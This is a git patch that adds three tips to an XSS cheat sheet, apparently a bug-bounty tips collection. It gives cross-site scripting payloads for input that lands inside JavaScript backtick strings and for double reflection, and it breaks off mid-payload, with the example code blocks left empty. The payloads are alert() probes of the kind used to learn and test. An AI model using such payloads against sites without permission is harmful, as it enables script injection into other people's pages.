From 74b4c4b2ebe83f9dd268bd593f8c34693a43f85c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+MD15@users.noreply.github.com> Date: Mon, 14 Sep 2020 10:38:20 +0700 Subject: [PATCH] XSS [4] Add 3 tips --- XSS.md | 58 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) diff --git a/XSS.md b/XSS.md index 60a04f2..cfd5c5c 100644 --- a/XSS.md +++ b/XSS.md @@ -185,5 +185,63 @@ The quotes are escaped by a backslash so we need to bypass them > Payload number 2 uses when quote escaped by backslash +11. Use when input lands inside backticks delimited strings +```html +${alert(1)} +``` + +* Example source code +```html + +``` + +* After input the payload +```html + +``` + +12. Uses when there is multiple reflections on same page. (Double Reflection) +```html +'onload=alert(1)>alert(1)